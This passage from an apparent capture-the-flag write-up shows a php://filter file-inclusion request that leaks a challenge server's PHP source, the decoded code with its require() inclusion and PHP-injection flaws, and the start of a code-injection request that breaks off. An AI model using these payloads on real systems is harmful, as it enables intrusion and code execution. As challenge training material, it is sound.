&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/exception.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ex.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;112&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;operation&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;ReadCrashDump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;crashdump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;php://filter/read=convert.base64-encode/resource=exception&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 29 Dec 2016 15:53:25 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;3168&lt;/span&gt;

PD9waHAgCgojIEF1ZGlvIGZpbGUgZnJvbSBEaXNjb21ib2J1bGF0b3IgaW4gd2Vicm9vdDogZGlzY29tYm9idWxhdGVkLWF1ZGlvLTYtWHl6RTNOOVlxS05ILm1wMwoKIyBDb2RlIGZyb20gaHR0cDovL3RoaXNpbnRlcmVzdHNtZS5jb20vcmVjZWl2aW5nLWpzb24tcG9zdC1kYXRhLXZpYS1waHAvCiMgTWFrZSBzdXJlIHRoYXQgaXQgaXMgYSBQT1NUIHJlcXVlc3QuCmlmKHN0cmNhc2VjbXAoJF9TRVJWRVJbJ1JFUVVFU1RfTUVUSE9EJ10sICdQT1NUJykgIT0gMCl7CiAgICBkaWUoIlJlcXVlc3QgbWV0aG9kIG11c3QgYmUgUE9TVFxuIik7Cn0KCSAKIyBNYWtlIHN1cmUgdGhhdCB0aGUgY29udGVudCB0eXBlIG9mIHRoZSBQT1NUIHJlcXVlc3QgaGFzIGJlZW4gc2V0IHRvIGFwcGxpY2F0aW9uL2pzb24KJGNvbnRlbnRUeXBlID0gaXNzZXQoJF9TRVJWRVJbIkNPTlRFTlRfVFlQRSJdKSA/IHRyaW0oJF9TRVJWRVJbIkNPTlRFTlRfVFlQRSJdKSA6ICcnOwppZihzdHJjYXNlY21wKCRjb250ZW50VHlwZSwgJ2FwcGxpY2F0aW9uL2pzb24nKSAhPSAwKXsKICAgIGRpZSgiQ29udGVudCB0eXBlIG11c3QgYmU6IGFwcGxpY2F0aW9uL2pzb25cbiIpOwp9CgkKIyBHcmFiIHRoZSByYXcgUE9TVC4gTmVjZXNzYXJ5IGZvciBKU09OIGluIHBhcnRpY3VsYXIuCiRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CiRvYmogPSBqc29uX2RlY29kZSgkY29udGVudCwgdHJ1ZSk7CgkjIElmIGpzb25fZGVjb2RlIGZhaWxlZCwgdGhlIEpTT04gaXMgaW52YWxpZC4KaWYoIWlzX2FycmF5KCRvYmopKXsKICAgIGRpZSgiUE9TVCBjb250YWlucyBpbnZhbGlkIEpTT04hXG4iKTsKfQoKIyBQcm9jZXNzIHRoZSBKU09OLgppZiAoICEgaXNzZXQoICRvYmpbJ29wZXJhdGlvbiddKSBvciAoCgkkb2JqWydvcGVyYXRpb24nXSAhPT0gIldyaXRlQ3Jhc2hEdW1wIiBhbmQKCSRvYmpbJ29wZXJhdGlvbiddICE9PSAiUmVhZENyYXNoRHVtcCIpKQoJewoJZGllKCJGYXRhbCBlcnJvciEgSlNPTiBrZXkgJ29wZXJhdGlvbicgbXVzdCBiZSBzZXQgdG8gV3JpdGVDcmFzaER1bXAgb3IgUmVhZENyYXNoRHVtcC5cbiIpOwp9CmlmICggaXNzZXQoJG9ialsnZGF0YSddKSkgewoJaWYgKCRvYmpbJ29wZXJhdGlvbiddID09PSAiV3JpdGVDcmFzaER1bXAiKSB7CgkJIyBXcml0ZSBhIG5ldyBjcmFzaCBkdW1wIHRvIGRpc2sKCQlwcm9jZXNzQ3Jhc2hEdW1wKCRvYmpbJ2RhdGEnXSk7Cgl9CgllbHNlaWYgKCRvYmpbJ29wZXJhdGlvbiddID09PSAiUmVhZENyYXNoRHVtcCIpIHsKCQkjIFJlYWQgYSBjcmFzaCBkdW1wIGJhY2sgZnJvbSBkaXNrCgkJcmVhZENyYXNoZHVtcCgkb2JqWydkYXRhJ10pOwoJfQp9CmVsc2UgewoJIyBkYXRhIGtleSB1bnNldAoJZGllKCJGYXRhbCBlcnJvciEgSlNPTiBrZXkgJ2RhdGEnIG11c3QgYmUgc2V0LlxuIik7Cn0KZnVuY3Rpb24gcHJvY2Vzc0NyYXNoZHVtcCgkY3Jhc2hkdW1wKSB7CgkkYmFzZXBhdGggPSAiL3Zhci93d3cvaHRtbC9kb2NzLyI7Cgkkb3V0cHV0ZmlsZW5hbWUgPSB0ZW1wbmFtKCRiYXNlcGF0aCwgImNyYXNoZHVtcC0iKTsKCXVubGluaygkb3V0cHV0ZmlsZW5hbWUpOwoJCgkkb3V0cHV0ZmlsZW5hbWUgPSAkb3V0cHV0ZmlsZW5hbWUgLiAiLnBocCI7CgkkYmFzZW5hbWUgPSBiYXNlbmFtZSgkb3V0cHV0ZmlsZW5hbWUpOwoJCgkkY3Jhc2hkdW1wX2VuY29kZWQgPSAiPD9waHAgcHJpbnQoJyIgLiBqc29uX2VuY29kZSgkY3Jhc2hkdW1wLCBKU09OX1BSRVRUWV9QUklOVCkgLiAiJyk7IjsKCWZpbGVfcHV0X2NvbnRlbnRzKCRvdXRwdXRmaWxlbmFtZSwgJGNyYXNoZHVtcF9lbmNvZGVkKTsKCQkJCglwcmludCA8PDxFTkQKewoJInN1Y2Nlc3MiIDogdHJ1ZSwKCSJmb2xkZXIiIDogImRvY3MiLAoJImNyYXNoZHVtcCIgOiAiJGJhc2VuYW1lIgp9CgpFTkQ7Cn0KZnVuY3Rpb24gcmVhZENyYXNoZHVtcCgkcmVxdWVzdGVkQ3Jhc2hkdW1wKSB7CgkkYmFzZXBhdGggPSAiL3Zhci93d3cvaHRtbC9kb2NzLyI7CgljaGRpcigkYmFzZXBhdGgpOwkJCgkKCWlmICggISBpc3NldCgkcmVxdWVzdGVkQ3Jhc2hkdW1wWydjcmFzaGR1bXAnXSkpIHsKCQlkaWUoIkZhdGFsIGVycm9yISBKU09OIGtleSAnY3Jhc2hkdW1wJyBtdXN0IGJlIHNldC5cbiIpOwoJfQoKCWlmICggc3Vic3RyKHN0cnJjaHIoJHJlcXVlc3RlZENyYXNoZHVtcFsnY3Jhc2hkdW1wJ10sICIuIiksIDEpID09PSAicGhwIiApIHsKCQlkaWUoIkZhdGFsIGVycm9yISBjcmFzaGR1bXAgdmFsdWUgZHVwbGljYXRlICcucGhwJyBleHRlbnNpb24gZGV0ZWN0ZWQuXG4iKTsKCX0KCWVsc2UgewoJCXJlcXVpcmUoJHJlcXVlc3RlZENyYXNoZHVtcFsnY3Jhc2hkdW1wJ10gLiAnLnBocCcpOwoJfQkKfQoKPz4K
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Yes! We managed to get the source code of the &lt;code&gt;exception.php&lt;/code&gt; page,
encoded in base64. By decoding it, we have access to the source code, and we
can see how our data are treated:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="c1"&gt;# Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3&lt;/span&gt;
&lt;/span&gt;
&lt;span class="c1"&gt;# Code from http://thisinterestsme.com/receiving-json-post-data-via-php/&lt;/span&gt;
&lt;span class="c1"&gt;# Make sure that it is a POST request.&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;strcasecmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_SERVER&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;REQUEST_METHOD&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;POST&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
    &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Request method must be POST&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Make sure that the content type of the POST request has been set to application/json&lt;/span&gt;
&lt;span class="nv"&gt;$contentType&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;isset&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_SERVER&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;CONTENT_TYPE&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="nb"&gt;trim&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_SERVER&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;CONTENT_TYPE&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;strcasecmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$contentType&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;application/json&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
    &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Content type must be: application/json&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Grab the raw POST. Necessary for JSON in particular.&lt;/span&gt;
&lt;span class="nv"&gt;$content&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;file_get_contents&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;php://input&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nv"&gt;$obj&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;json_decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$content&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;true&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="c1"&gt;# If json_decode failed, the JSON is invalid.&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;is_array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$obj&lt;/span&gt;&lt;span class="p"&gt;)){&lt;/span&gt;
    &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;POST contains invalid JSON!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Process the JSON.&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt; &lt;span class="nb"&gt;isset&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nv"&gt;$obj&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;operation&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="k"&gt;or&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="nv"&gt;$obj&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;operation&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;!==&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;WriteCrashDump&amp;quot;&lt;/span&gt; &lt;span class="k"&gt;and&lt;/span&gt;
    &lt;span class="nv"&gt;$obj&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;operation&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;!==&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;ReadCrashDump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Fatal error! JSON key &amp;#39;operation&amp;#39; must be set to WriteCrashDump or ReadCrashDump.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nb"&gt;isset&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$obj&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;data&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$obj&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;operation&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;WriteCrashDump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;# Write a new crash dump to disk&lt;/span&gt;
        &lt;span class="nx"&gt;processCrashDump&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$obj&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;data&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;elseif&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$obj&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;operation&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;ReadCrashDump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;# Read a crash dump back from disk&lt;/span&gt;
        &lt;span class="nx"&gt;readCrashdump&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$obj&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;data&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;# data key unset&lt;/span&gt;
    &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Fatal error! JSON key &amp;#39;data&amp;#39; must be set.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;processCrashdump&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$crashdump&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$basepath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;/var/www/html/docs/&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nv"&gt;$outputfilename&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;tempnam&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$basepath&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;crashdump-&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nb"&gt;unlink&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$outputfilename&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="nv"&gt;$outputfilename&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$outputfilename&lt;/span&gt; &lt;span class="o"&gt;.&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;.php&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nv"&gt;$basename&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;basename&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$outputfilename&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="hll"&gt;    &lt;span class="nv"&gt;$crashdump_encoded&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;lt;?php print(&amp;#39;&amp;quot;&lt;/span&gt; &lt;span class="o"&gt;.&lt;/span&gt; &lt;span class="nb"&gt;json_encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$crashdump&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;JSON_PRETTY_PRINT&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;.&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;#39;);&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;    &lt;span class="nb"&gt;file_put_contents&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$outputfilename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$crashdump_encoded&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="s"&gt;&amp;lt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="dl"&gt;END&lt;/span&gt;&lt;span class="s"&gt;&lt;/span&gt;
&lt;span class="s"&gt;{&lt;/span&gt;
&lt;span class="s"&gt;    &amp;quot;success&amp;quot; : true,&lt;/span&gt;
&lt;span class="s"&gt;    &amp;quot;folder&amp;quot; : &amp;quot;docs&amp;quot;,&lt;/span&gt;
&lt;span class="s"&gt;    &amp;quot;crashdump&amp;quot; : &amp;quot;$basename&amp;quot;&lt;/span&gt;
&lt;span class="s"&gt;}&lt;/span&gt;

&lt;span class="dl"&gt;END&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;readCrashdump&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$requestedCrashdump&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$basepath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;/var/www/html/docs/&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nb"&gt;chdir&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$basepath&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt; &lt;span class="nb"&gt;isset&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$requestedCrashdump&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;crashdump&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Fatal error! JSON key &amp;#39;crashdump&amp;#39; must be set.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nb"&gt;substr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;strrchr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$requestedCrashdump&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;crashdump&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;php&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Fatal error! crashdump value duplicate &amp;#39;.php&amp;#39; extension detected.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$requestedCrashdump&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;crashdump&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;.&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;.php&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;&lt;span class="x"&gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now that I'm pasting this source code, I see that the audio file path is given
in the top comment of the file. But I was so eager to find out how
&lt;code&gt;WriteCrashDump&lt;/code&gt; and &lt;code&gt;ReadCrashDump&lt;/code&gt; work that I didn't see it.
Woopsie for me! Ok, bear with me, and let's suppose that the audio file was not
given in the comment (plus, it's more fun this way, so there!).&lt;/p&gt;
&lt;p&gt;When we call &lt;code&gt;WriteCrashDump&lt;/code&gt;, we can see that our data are JSON encoded,
surrounded by &lt;code&gt;print('&lt;/code&gt; and &lt;code&gt;');&lt;/code&gt;, then stored in a PHP file.
Since JSON encoding does not encode single-quote, we can escape from our
&lt;code&gt;print&lt;/code&gt; statement:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/exception.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ex.northpolewonderland.com&lt;/span&gt;
